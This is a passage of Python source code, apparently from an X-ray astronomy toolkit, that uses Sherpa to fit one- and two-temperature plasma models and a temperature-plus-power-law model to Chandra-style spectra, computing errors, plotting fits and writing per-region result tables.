totcnts = numpy.sum(cnts)
if totcnts >= min_counts:
if nobs_current_reg > 1:
print('\nFitting '+str(nobs_current_reg)+' spectra in region '+str(i + reg_num_to_start)+' ('+str(int(totcnts))+' counts total)...')
else:
print('\nFitting 1 spectrum in region '+str(i + reg_num_to_start)+' ('+str(int(totcnts))+' counts total)...')
abs1.nH = nH_Gal
if fix_nH_Gal:
freeze(abs1.nH)
else:
thaw(abs1.nH)
plsm1.kt = kT_guess
thaw(plsm1.kt)
plsm1.abundanc = Ab_guess
if fix_abund:
freeze(plsm1.abundanc)
else:
thaw(plsm1.abundanc)
plsm1.redshift = redshift
freeze(plsm1.redshift)
fit()
fit_result = get_fit_results()
red_chi2 = fit_result.rstat
num_bins = fit_result.numpoints
if fix_nH_Gal:
nH = nH_Gal
kT = fit_result.parvals[0]
if fix_abund:
Z = Ab_guess
norm = fit_result.parvals[1]
else:
Z = fit_result.parvals[1]
norm = fit_result.parvals[2]
else:
nH = fit_result.parvals[0]
kT = fit_result.parvals[1]
if fix_abund:
Z = Ab_guess
norm = fit_result.parvals[2]
else:
Z = fit_result.parvals[2]
norm = fit_result.parvals[3]
del fit_result
if make_plots:
if len(good_src_ids) > 10:
nplots = numpy.ceil(len(good_src_ids) / 10.0)
else:
nplots = 1
for plot_num in range(nplots):
start_indx = 0 + numpy.floor(len(good_src_ids) / nplots) * plot_num
if plot_num == nplots - 1:
end_indx = len(good_src_ids)
else:
end_indx = numpy.floor(len(good_src_ids) / nplots) * (plot_num + 1.0)
clear() # delete any plot windows
add_window()
#add_window(["display", False])
set_preference("frame.transparency", "true")
#set_preference("window.display", "false")
label_ypos = 0.2
ccolor_indx = 0
for p in good_src_ids[start_indx:end_indx]:
plot_fit_delchi(p, overplot=True, clearwindow=False)
log_scale(X_AXIS)
set_current_plot("plot1")
limits(X_AXIS, 0.1, 10) # keV
limits(Y_AXIS, 1E-7, 0.2)
log_scale(Y_AXIS)
set_curve("crv1", ["symbol.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
set_curve("crv2", ["line.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
label_ypos = label_ypos / 2.0
add_label(4.0, label_ypos, "obs"+str(p+1))
set_label(["color", ccolor[ccolor_indx]])
set_current_plot("plot2")
limits(X_AXIS, 0.1, 10) # keV
limits(Y_AXIS, -5.0, 5.0)
set_curve(["symbol.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
set_plot_xlabel("Energy (keV)")
set_plot_ylabel("Sigma")
ccolor_indx += 1
set_current_plot("plot1")
set_plot_title("Fit for region "+str(i+reg_num_to_start))
set_plot_ylabel("Counts s^{-1} keV^{-1}")
if nplots > 1:
fit_plot_file = "reg" + str(i+reg_num_to_start) + "_plot" + str(plot_num) + "_1T_fit.pdf"
else:
fit_plot_file = "reg" + str(i+reg_num_to_start) + "_1T_fit.pdf"
print_window(fit_plot_file, ["orientation", "portrait", "clobber", True])
if find_errors:
covar()
covar_result = get_covar_results()
if fix_nH_Gal:
nH_loerr = 0.0
nH_hierr = 0.0
kT_loerr = covar_result.parmins[0]
kT_hierr = covar_result.parmaxes[0]
if fix_abund:
Z_loerr = 0.0
Z_hierr = 0.0
norm_loerr = covar_result.parmins[1]
norm_hierr = covar_result.parmaxes[1]
else:
Z_loerr = covar_result.parmins[1]
Z_hierr = covar_result.parmaxes[1]
norm_loerr = covar_result.parmins[2]
norm_hierr = covar_result.parmaxes[2]
else:
nH_loerr =covar_result.parmins[0]
kT_loerr = covar_result.parmins[1]
nH_hierr = covar_result.parmaxes[0]
kT_hierr = covar_result.parmaxes[1]
if fix_abund:
Z_loerr = 0.0
Z_hierr = 0.0
norm_loerr = covar_result.parmins[2]
norm_hierr = covar_result.parmaxes[2]
else:
Z_loerr = covar_result.parmins[2]
Z_hierr = covar_result.parmaxes[2]
norm_loerr = covar_result.parmins[3]
norm_hierr = covar_result.parmaxes[3]
del covar_result
# Check for failed errors (= None) and set them to +/- best-fit value
if not fix_nH_Gal:
if nH_loerr == None: nH_loerr = -nH
if nH_hierr == None: nH_hierr = nH
if kT_loerr == None: kT_loerr = -kT
if kT_hierr == None: kT_hierr = kT
if not fix_abund:
if Z_loerr == None: Z_loerr = -Z
if Z_hierr == None: Z_hierr = Z
if norm_loerr == None: norm_loerr = -norm
if norm_hierr == None: norm_hierr = norm
else:
kT_loerr = 0.0
Z_loerr = 0.0
nH_loerr = 0.0
norm_loerr = 0.0
kT_hierr = 0.0
Z_hierr = 0.0
nH_hierr = 0.0
norm_hierr = 0.0
else: # if total counts < min_counts, just write zeros
                print('\n Warning: no fit performed for region '+str(i + reg_num_to_start)+':')
if nobs > 1:
print(' Spectra have insufficient counts after filtering or do not exist.')
else:
print(' Spectrum has insufficient counts after filtering or does not exist.')
print(' --> All parameters for this region set to 0.0.')
kT = 0.0
Z = 0.0
nH = 0.0
norm = 0.0
kT_loerr = 0.0
Z_loerr = 0.0
nH_loerr = 0.0
norm_loerr = 0.0
kT_hierr = 0.0
Z_hierr = 0.0
nH_hierr = 0.0
norm_hierr = 0.0
red_chi2 = 0.0
num_bins = 0
results_file.write('%7r %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %8.1f %8r\n' % (i+reg_num_to_start, kT, kT_loerr, kT_hierr, Z, Z_loerr, Z_hierr, norm, norm_loerr, norm_hierr, nH, nH_loerr, nH_hierr, red_chi2, totcnts, num_bins) )
results_file.close()
# Finally, make sure all regions have an entry in the fit results file
# (this shouldn't be needed, but just in case...)
dtype = {'names': ('reg_id', 'kT', 'kT_lo', 'kT_hi', 'Z', 'Z_lo', 'Z_hi', 'norm', 'norm_lo', 'norm_hi', 'nH', 'nH_lo', 'nH_hi', 'chi2', 'totcnts', 'nbins'), 'formats': ('i4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'i4')}
data = numpy.loadtxt(fit_results_file, dtype=dtype)
reg_num = data["reg_id"]
missing_regs = []
n_missing = 0
for i in range(len(reg_num)):
if int(reg_num[i]) != i + reg_num_to_start + n_missing:
missing_regs.append(i + reg_num_to_start + n_missing)
n_missing += 1
if n_missing > 0:
results_file = open(fit_results_file, "a") # append missing regions
for i in range(n_missing):
results_file.write('%7r %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %8.1f %8r\n' % (missing_regs[i]+reg_num_to_start, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0) )
else:
print('\n Output file ('+fit_results_file+') exists and clobber = False.')
def call_sherpa_2T(spectra, redshift, nH_Gal, kT_guess, Ab_guess, root, lo_energy='0.5', hi_energy='7.0', plasma_model='mekal', min_counts=100, binning=None, reg_num_to_start=0, fix_nH_Gal=True, fix_abund=False, find_errors=False, make_plots=False, min_cnt_rate_ratio=0.3, clobber=False):
"""
Calls Sherpa to fit a two-temperature model to one or more spectra.
Inputs: spectra - list of input PI files. Can be a list of
lists if there is more than one observation:
e.g., [spectra_obs1, spectra_obs2], where
                     spectra_obs1 = ['reg1.pi', 'reg2.pi', ...]
redshift - redshift of source
nH_Gal - Galactic N_H (10^22 cm^-2)
kT_guess - initial guess for temperature (keV)
Ab_guess - initial guess for abundance
root - root of output file with fit results
lo_energy - lower bound of fitted energy range (keV)
hi_energy - upper bound of fitted energy range (keV)
plasma_model - specifies the plasma model (mekal or apec)
min_counts - minimum number of total counts required for
fitting
binning - number of counts per bin for fitting
reg_num_to_start - number to start from when numbering the
fit results by region
fix_nH_Gal - if True, freezes nH_Gal
fix_abund - if True, freezes abundance
find_errors - if True, calculates errors
make_plots - if True, make a plot of fit for each region
min_cnt_rate_ratio - min ratio (relative to max cnt rate
in region) below which to discard
observations
clobber - if True, overwrite existing file
    Outputs: The fit results are saved to the file:
root+'_wabs_2'+plasma_model+'.dat'
"""
if isinstance(spectra, str): spectra = [spectra]
if isinstance(spectra[0], str):
nreg = 1 # number of regions
else:
nreg = len(spectra[0]) # number of regions
nobs = len(spectra) # number of observations
fit_results_file = root + '_wabs_2' + plasma_model + '.dat'
ccolor = ["blue", "gold", "cyan", "forest", "darkred", "red", "gray", "green", "magenta", "orange", "black", "yellow", "turquoise", "firebrick", "brown", "azure", "honeydew", "lime", "mistyrose", "navy"]
if type(redshift) == str: redshift = float(redshift)
if type(nH_Gal) == str: nH_Gal = float(nH_Gal)
if type(kT_guess) == str: kT_guess = float(kT_guess)
if type(Ab_guess) == str: Ab_guess = float(Ab_guess)
if type(lo_energy) == str: lo_energy = float(lo_energy)
if type(hi_energy) == str: hi_energy = float(hi_energy)
if os.path.isfile(fit_results_file) == False or clobber == True:
results_file = open(fit_results_file, "w")
results_file.write('# Fit results for wabs*'+plasma_model+' (zeros indicate that no fitting was performed)\n')
results_file.write('# Reg_no. kT1 kT1_loerr kT1_hierr Z1 Z1_loerr Z1_hierr norm1 norm1_loerr norm1_hierr kT2 kT2_loerr kT2_hierr Z2 Z2_loerr Z2_hierr norm2 norm2_loerr norm2_hierr nH_Gal nH_loerr nH_hierr red_chisq total_counts num_bins\n')
if make_plots:
add_window(["display", False])
for i in range(nreg):
print('\n')
clean() # reset everything
gc.collect() # collect garbage every step to avoid memory problems when fitting a large number (>10) of observations simultaneously
nobs_current_reg = 0 # number of valid spectra for this region
if nobs > 1:
cnts = numpy.zeros(nobs) # array to store counts
max_rate = numpy.zeros(nobs) # max count rate [counts/s/keV]
src_id = 0 # index of source id
good_src_ids = numpy.zeros(nobs, dtype=int) - 1
for j in range(nobs):
pi_file = spectra[j][i]
pi_root = os.path.splitext(pi_file)[0]
if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
load_pha(src_id, pi_file)
if binning != None:
print('Grouping to ' + str(binning) + ' counts...')
group_counts(src_id, binning)
ignore_id(src_id, 0.0, lo_energy)
ignore_id(src_id, hi_energy, None)
cnts[j] = calc_data_sum(lo_energy, hi_energy, src_id) # get counts in filtered dataset
print('Counts for obs '+str(j+1)+': '+str(int(cnts[j])))
cnt_rate = get_rate(src_id, filter=True)
if len(cnt_rate) == 0: # when few counts (<50), get_rate can return zero-length array
max_rate[j] = 0.0
else:
max_rate[j] = numpy.max(cnt_rate)
subtract(src_id) # subtract the background
if src_id == 0:
if plasma_model == 'mekal':
set_source(src_id, xswabs.abs1 * (xsmekal.plsm1 + xsmekal.plsm2))
if plasma_model == 'apec':
set_source(src_id, xswabs.abs1 * (xsapec.plsm1 + xsapec.plsm2))
else:
set_source(src_id, abs1 * (plsm1 + plsm2))
good_src_ids[j] = src_id
src_id += 1
# Filter out ignored observations
good_src_ids_indx = numpy.where(good_src_ids >= 0)
good_src_ids = good_src_ids[good_src_ids_indx]
max_rate = max_rate[good_src_ids_indx]
cnts = cnts[good_src_ids_indx]
# If min_cnt_rate_ratio is specified, check whether the count rate
# of any observation falls below the limit.
if min_cnt_rate_ratio != None:
max_rate_overall = numpy.max(max_rate)
max_rate_ratios = max_rate / max_rate_overall
lowcr_src_ids_indx = numpy.where(max_rate_ratios < min_cnt_rate_ratio)
highcr_src_ids_indx = numpy.where(max_rate_ratios >= min_cnt_rate_ratio)
if len(lowcr_src_ids_indx) > 0:
lowcr_src_ids = good_src_ids[lowcr_src_ids_indx]
good_src_ids = good_src_ids[highcr_src_ids_indx]
cnts = cnts[highcr_src_ids_indx]
for b in range(len(lowcr_src_ids)):
print('Removing observation '+str(lowcr_src_ids[b]+1)+' (dataset '+str(lowcr_src_ids[b])+') for low count rate.')
delete_data(lowcr_src_ids[b])
nobs_current_reg -= 1
            if nobs == 1:
                cnts = numpy.zeros(1)  # array to store counts
                pi_file = spectra[i]
pi_root = os.path.splitext(pi_file)[0]
if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
load_pha(pi_file)
if binning != None:
                        group_counts(binning)  # group the default (only) dataset
if plasma_model == 'mekal':
set_source(xswabs.abs1 * (xsmekal.plsm1 + xsmekal.plsm2))
if plasma_model == 'apec':
set_source(xswabs.abs1 * (xsapec.plsm1 + xsapec.plsm2))
ignore(0.0, lo_energy)
ignore(hi_energy, None)
cnts[0] = calc_data_sum(lo_energy, hi_energy) # get counts in filtered dataset
subtract()
# Check whether total counts >= min_counts.
# If so, fit; if not, skip the fit
totcnts = numpy.sum(cnts)
if totcnts >= min_counts:
if nobs_current_reg > 1:
print('\nFitting '+str(nobs_current_reg)+' spectra in region '+str(i + reg_num_to_start)+' ('+str(totcnts)+' counts total)...')
else:
print('\nFitting 1 spectrum in region '+str(i + reg_num_to_start)+' ('+str(numpy.sum(cnts))+' counts total)...')
abs1.nH = nH_Gal
if fix_nH_Gal:
freeze(abs1.nH)
else:
thaw(abs1.nH)
plsm1.kt = kT_guess
thaw(plsm1.kt)
plsm1.abundanc = Ab_guess
if fix_abund:
freeze(plsm1.abundanc)
else:
thaw(plsm1.abundanc)
plsm1.redshift = redshift
freeze(plsm1.redshift)
plsm2.kt = kT_guess
thaw(plsm2.kt)
plsm2.abundanc = Ab_guess
if fix_abund:
freeze(plsm2.abundanc)
else:
thaw(plsm2.abundanc)
link(plsm1.abundanc, plsm2.abundanc)
plsm2.redshift = redshift
freeze(plsm2.redshift)
set_method("moncar")
fit()
fit_result = get_fit_results()
red_chi2 = fit_result.rstat
num_bins = fit_result.numpoints
if fix_nH_Gal:
nH = nH_Gal
kT1 = fit_result.parvals[0]
if fix_abund:
Z1 = Ab_guess
norm1 = fit_result.parvals[1]
kT2 = fit_result.parvals[2]
norm2 = fit_result.parvals[3]
else:
Z1 = fit_result.parvals[1]
norm1 = fit_result.parvals[2]
kT2 = fit_result.parvals[3]
norm2 = fit_result.parvals[4]
else:
nH = fit_result.parvals[0]
kT1 = fit_result.parvals[1]
if fix_abund:
Z1 = Ab_guess
norm1 = fit_result.parvals[2]
kT2 = fit_result.parvals[3]
norm2 = fit_result.parvals[4]
else:
Z1 = fit_result.parvals[2]
norm1 = fit_result.parvals[3]
kT2 = fit_result.parvals[4]
norm2 = fit_result.parvals[5]
del fit_result
if find_errors:
covar()
covar_result = get_covar_results()
if fix_nH_Gal:
nH_loerr = 0.0
nH_hierr = 0.0
kT1_loerr = covar_result.parmins[0]
kT1_hierr = covar_result.parmaxes[0]
if fix_abund:
Z1_loerr = 0.0
Z1_hierr = 0.0
norm1_loerr = covar_result.parmins[1]
norm1_hierr = covar_result.parmaxes[1]
kT2_loerr = covar_result.parmins[2]
norm2_loerr = covar_result.parmins[3]
kT2_hierr = covar_result.parmaxes[2]
norm2_hierr = covar_result.parmaxes[3]
else:
Z1_loerr = covar_result.parmins[1]
norm1_loerr = covar_result.parmins[2]
kT1_hierr = covar_result.parmaxes[0]
Z1_hierr = covar_result.parmaxes[1]
norm1_hierr = covar_result.parmaxes[2]
kT2_loerr = covar_result.parmins[3]
norm2_loerr = covar_result.parmins[4]
kT2_hierr = covar_result.parmaxes[3]
norm2_hierr = covar_result.parmaxes[4]
else:
nH_loerr =covar_result.parmins[0]
nH_hierr = covar_result.parmaxes[0]
kT1_loerr = covar_result.parmins[1]
kT1_hierr = covar_result.parmaxes[1]
if fix_abund:
Z1_loerr = 0.0
Z1_hierr = 0.0
norm1_loerr = covar_result.parmins[2]
norm1_hierr = covar_result.parmaxes[2]
kT2_loerr = covar_result.parmins[3]
norm2_loerr = covar_result.parmins[4]
kT2_hierr = covar_result.parmaxes[3]
norm2_hierr = covar_result.parmaxes[4]
else:
Z1_loerr = covar_result.parmins[2]
norm1_loerr = covar_result.parmins[3]
Z1_hierr = covar_result.parmaxes[2]
norm1_hierr = covar_result.parmaxes[3]
kT2_loerr = covar_result.parmins[4]
norm2_loerr = covar_result.parmins[5]
kT2_hierr = covar_result.parmaxes[4]
norm2_hierr = covar_result.parmaxes[5]
del covar_result
# Check for failed errors (= None) and set them to +/- best-fit value
if not fix_nH_Gal:
if nH_loerr == None: nH_loerr = -nH
if nH_hierr == None: nH_hierr = nH
if kT1_loerr == None: kT1_loerr = -kT1
if kT1_hierr == None: kT1_hierr = kT1
if not fix_abund:
if Z1_loerr == None: Z1_loerr = -Z1
if Z1_hierr == None: Z1_hierr = Z1
if norm1_loerr == None: norm1_loerr = -norm1
if norm1_hierr == None: norm1_hierr = norm1
if kT2_loerr == None: kT2_loerr = -kT2
if kT2_hierr == None: kT2_hierr = kT2
if norm2_loerr == None: norm2_loerr = -norm2
if norm2_hierr == None: norm2_hierr = norm2
else:
kT1_loerr = 0.0
Z1_loerr = 0.0
nH_loerr = 0.0
norm1_loerr = 0.0
kT1_hierr = 0.0
Z1_hierr = 0.0
nH_hierr = 0.0
norm1_hierr = 0.0
kT2_loerr = 0.0
norm2_loerr = 0.0
kT2_hierr = 0.0
norm2_hierr = 0.0
else: # if total counts < min_counts, just write zeros
                print('\n Warning: no fit performed for region '+str(i + reg_num_to_start)+':')
if nobs > 1:
print(' Spectra have insufficient counts after filtering or do not exist.')
else:
print(' Spectrum has insufficient counts after filtering or does not exist.')
print(' --> All parameters for this region set to 0.0.')
kT1 = 0.0
Z1 = 0.0
nH = 0.0
norm1 = 0.0
kT2 = 0.0
norm2 = 0.0
kT1_loerr = 0.0
Z1_loerr = 0.0
nH_loerr = 0.0
norm1_loerr = 0.0
kT1_hierr = 0.0
Z1_hierr = 0.0
nH_hierr = 0.0
norm1_hierr = 0.0
kT2_loerr = 0.0
norm2_loerr = 0.0
kT2_hierr = 0.0
norm2_hierr = 0.0
red_chi2 = 0.0
num_bins = 0
results_file.write('%7r %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %8.1f %8r\n' % (i+reg_num_to_start, kT1, kT1_loerr, kT1_hierr, Z1, Z1_loerr, Z1_hierr, norm1, norm1_loerr, norm1_hierr, kT2, kT2_loerr, kT2_hierr, Z1, Z1_loerr, Z1_hierr, norm2, norm2_loerr, norm2_hierr, nH, nH_loerr, nH_hierr, red_chi2, totcnts, num_bins) )
results_file.close()
else:
print('\n Output file ('+fit_results_file+') exists and clobber = False.')
def call_sherpa_1T_plus_pow(spectra, redshift, nH_Gal, kT_guess, Ab_guess, plindx_guess, root, lo_energy='0.5', hi_energy='7.0', plasma_model='mekal', min_counts=100, binning=None, reg_num_to_start=0, fix_nH_Gal=True, fix_abund=False, find_errors=False, min_cnt_rate_ratio=0.3, make_plots=False, clobber=False):
"""
Calls Sherpa to fit a single-temperature-plus-power-law model to one or more spectra.
Inputs: spectra - list of input PI files. Can be a list of
lists if there is more than one observation:
e.g., [spectra_obs1, spectra_obs2], where
                     spectra_obs1 = ['reg1.pi', 'reg2.pi', ...]
redshift - redshift of source
nH_Gal - Galactic N_H (10^22 cm^-2)
kT_guess - initial guess for temperature (keV)
Ab_guess - initial guess for abundance
             plindx_guess - initial guess for the power-law index
root - root of output file with fit results
lo_energy - lower bound of fitted energy range (keV)
hi_energy - upper bound of fitted energy range (keV)
plasma_model - specifies the plasma model (mekal or apec)
min_counts - minimum number of total counts required for
fitting
binning - number of counts per bin for fitting
reg_num_to_start - number to start from when numbering the
fit results by region
fix_nH_Gal - if True, freezes nH_Gal
fix_abund - if True, freezes abundance
find_errors - if True, calculates errors
make_plots - if True, make a plot of fit for each region
min_cnt_rate_ratio - min ratio (relative to max cnt rate
in region) below which to discard
observations
clobber - if True, overwrite existing file
    Outputs: The fit results are saved to the file:
root+'_wabs_'+plasma_model+'_pow.dat'
"""
if isinstance(spectra, str): spectra = [spectra]
if isinstance(spectra[0], str):
nreg = 1 # number of regions
else:
nreg = len(spectra[0]) # number of regions
nobs = len(spectra) # number of observations
fit_results_file = root + '_wabs_' + plasma_model + '_pow.dat'
ccolor = ["blue", "gold", "cyan", "forest", "darkred", "red", "gray", "green", "magenta", "orange", "black", "yellow", "turquoise", "firebrick", "brown", "azure", "honeydew", "lime", "mistyrose", "navy"]
if type(redshift) == str: redshift = float(redshift)
if type(nH_Gal) == str: nH_Gal = float(nH_Gal)
if type(kT_guess) == str: kT_guess = float(kT_guess)
if type(Ab_guess) == str: Ab_guess = float(Ab_guess)
if type(plindx_guess) == str: plindx_guess = float(plindx_guess)
if type(lo_energy) == str: lo_energy = float(lo_energy)
if type(hi_energy) == str: hi_energy = float(hi_energy)
if os.path.isfile(fit_results_file) == False or clobber == True:
results_file = open(fit_results_file, "w")
results_file.write('# Fit results for wabs*'+plasma_model+' (zeros indicate that no fitting was performed)\n')
results_file.write('# Reg_no. kT kT_loerr kT_hierr Z Z_loerr Z_hierr norm norm_loerr norm_hierr plindx indx_loerr indx_hierr plnorm plnorm_loerr plnorm_hierr nH_Gal nH_loerr nH_hierr red_chisq total_counts num_bins\n')
for i in range(nreg):
print('\n')
clean() # reset everything
gc.collect() # collect garbage every step to avoid memory problems when fitting a large number (>10) of observations simultaneously
nobs_current_reg = 0 # number of valid spectra for this region
good_src_ids = numpy.zeros(nobs, dtype=int) - 1
if nobs > 1:
cnts = numpy.zeros(nobs) # array to store counts
max_rate = numpy.zeros(nobs) # max count rate [counts/s/keV]
src_id = 0 # index of source id
for j in range(nobs):
pi_file = spectra[j][i]
pi_root = os.path.splitext(pi_file)[0]
if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
load_pha(src_id, pi_file)
if binning != None:
print('Grouping to ' + str(binning) + ' counts...')
group_counts(src_id, binning)
ignore_id(src_id, 0.0, lo_energy)
ignore_id(src_id, hi_energy, None)
cnts[j] = calc_data_sum(lo_energy, hi_energy, src_id) # get counts in filtered dataset
print('Counts for obs '+str(j+1)+': '+str(int(cnts[j])))
cnt_rate = get_rate(src_id, filter=True)
if len(cnt_rate) == 0: # when few counts (<50), get_rate can return zero-length array
max_rate[j] = 0.0
else:
max_rate[j] = numpy.max(cnt_rate)
subtract(src_id) # subtract the background
if src_id == 0:
if plasma_model == 'mekal':
set_source(src_id, xswabs.abs1 * (xsmekal.plsm1 + xspowerlaw.pow1))
if plasma_model == 'apec':
set_source(src_id, xswabs.abs1 * (xsapec.plsm1 + xspowerlaw.pow1))
else:
set_source(src_id, abs1 * (plsm1 + pow1))
good_src_ids[j] = src_id
src_id += 1
# Filter out ignored observations
good_src_ids_indx = numpy.where(good_src_ids >= 0)
good_src_ids = good_src_ids[good_src_ids_indx]
max_rate = max_rate[good_src_ids_indx]
cnts = cnts[good_src_ids_indx]
# If min_cnt_rate_ratio is specified, check whether the count rate
# of any observation falls below the limit.
if min_cnt_rate_ratio != None:
max_rate_overall = numpy.max(max_rate)
max_rate_ratios = max_rate / max_rate_overall
lowcr_src_ids_indx = numpy.where(max_rate_ratios < min_cnt_rate_ratio)
highcr_src_ids_indx = numpy.where(max_rate_ratios >= min_cnt_rate_ratio)
if len(lowcr_src_ids_indx) > 0:
lowcr_src_ids = good_src_ids[lowcr_src_ids_indx]
good_src_ids = good_src_ids[highcr_src_ids_indx]
cnts = cnts[highcr_src_ids_indx]
for b in range(len(lowcr_src_ids)):
print('Removing observation '+str(lowcr_src_ids[b]+1)+' (dataset '+str(lowcr_src_ids[b])+') for low count rate.')
delete_data(lowcr_src_ids[b])
nobs_current_reg -= 1
            if nobs == 1:
                cnts = numpy.zeros(1)  # array to store counts
                pi_file = spectra[i]
pi_root = os.path.splitext(pi_file)[0]
if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
load_pha(pi_file)
if binning != None:
                        group_counts(binning)  # group the default (only) dataset
if plasma_model == 'mekal':
set_source(xswabs.abs1 * (xsmekal.plsm1 + xspowerlaw.pow1))
if plasma_model == 'apec':
set_source(xswabs.abs1 * (xsapec.plsm1 + xspowerlaw.pow1))
ignore(0.0, lo_energy)
ignore(hi_energy, None)
cnts[0] = calc_data_sum(lo_energy, hi_energy) # get counts in filtered dataset
subtract()
# Check whether total counts >= min_counts.
# If so, fit; if not, skip the fit
totcnts = numpy.sum(cnts)
if totcnts >= min_counts:
if nobs_current_reg > 1:
print('\nFitting '+str(nobs_current_reg)+' spectra in region '+str(i + reg_num_to_start)+' ('+str(totcnts)+' counts total)...')
else:
print('\nFitting 1 spectrum in region '+str(i + reg_num_to_start)+' ('+str(numpy.sum(cnts))+' counts total)...')
abs1.nH = nH_Gal
if fix_nH_Gal:
freeze(abs1.nH)
else:
thaw(abs1.nH)
plsm1.kt = kT_guess
thaw(plsm1.kt)
plsm1.abundanc = Ab_guess
thaw(plsm1.abundanc)
plsm1.redshift = redshift
freeze(plsm1.redshift)
pow1.PhoIndex = plindx_guess
set_method("moncar")
fit()
fit_result = get_fit_results()
red_chi2 = fit_result.rstat
num_bins = fit_result.numpoints
if fix_nH_Gal:
nH = nH_Gal
kT = fit_result.parvals[0]
Z = fit_result.parvals[1]
norm = fit_result.parvals[2]
powindx = fit_result.parvals[3]
pownorm = fit_result.parvals[4]
else:
nH = fit_result.parvals[0]
kT = fit_result.parvals[1]
Z = fit_result.parvals[2]
norm = fit_result.parvals[3]
powindx = fit_result.parvals[4]
pownorm = fit_result.parvals[5]
del fit_result
if make_plots:
if len(good_src_ids) > 10:
nplots = numpy.ceil(len(good_src_ids) / 10.0)
else:
nplots = 1
for plot_num in range(nplots):
start_indx = 0 + numpy.floor(len(good_src_ids) / nplots) * plot_num
if plot_num == nplots - 1:
end_indx = len(good_src_ids)
else:
end_indx = numpy.floor(len(good_src_ids) / nplots) * (plot_num + 1.0)
clear() # delete any plot windows
add_window()
#add_window(["display", False])
set_preference("frame.transparency", "true")
#set_preference("window.display", "false")
label_ypos = 0.2
ccolor_indx = 0
for p in good_src_ids[start_indx:end_indx]:
plot_fit_delchi(p, overplot=True, clearwindow=False)
log_scale(X_AXIS)
set_current_plot("plot1")
limits(X_AXIS, 0.1, 10) # keV
limits(Y_AXIS, 1E-7, 0.2)
log_scale(Y_AXIS)
set_curve("crv1", ["symbol.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
set_curve("crv2", ["line.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
label_ypos = label_ypos / 2.0
add_label(4.0, label_ypos, "obs"+str(p+1))
set_label(["color", ccolor[ccolor_indx]])
set_current_plot("plot2")
limits(X_AXIS, 0.1, 10) # keV
limits(Y_AXIS, -5.0, 5.0)
set_curve(["symbol.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
set_plot_xlabel("Energy (keV)")
set_plot_ylabel("Sigma")
ccolor_indx += 1
set_current_plot("plot1")
set_plot_title("Fit for region "+str(i+reg_num_to_start))
set_plot_ylabel("Counts s^{-1} keV^{-1}")
if nplots > 1:
fit_plot_file = "reg" + str(i+reg_num_to_start) + "_plot" + str(plot_num) + "_1T+pow_fit.pdf"
else:
fit_plot_file = "reg" + str(i+reg_num_to_start) + "_1T+pow_fit.pdf"
print_window(fit_plot_file, ["orientation", "portrait", "clobber", True])
if find_errors:
covar()
covar_result = get_covar_results()
if fix_nH_Gal:
nH_loerr = 0.0
nH_hierr = 0.0
kT_loerr = covar_result.parmins[0]
Z_loerr = covar_result.parmins[1]
norm_loerr = covar_result.parmins[2]
powindx_loerr = covar_result.parmins[3]
pownorm_loerr = covar_result.parmins[4]
kT_hierr = covar_result.parmaxes[0]
Z_hierr = covar_result.parmaxes[1]
norm_hierr = covar_result.parmaxes[2]
powindx_hierr = covar_result.parmaxes[3]
pownorm_hierr = covar_result.parmaxes[4]
else:
nH_loerr =covar_result.parmins[0]
kT_loerr = covar_result.parmins[1]
Z_loerr = covar_result.parmins[2]
norm_loerr = covar_result.parmins[3]
powindx_loerr = covar_result.parmins[4]
pownorm_loerr = covar_result.parmins[5]
nH_hierr = covar_result.parmaxes[0]
kT_hierr = covar_result.parmaxes[1]
Z_hierr = covar_result.parmaxes[2]
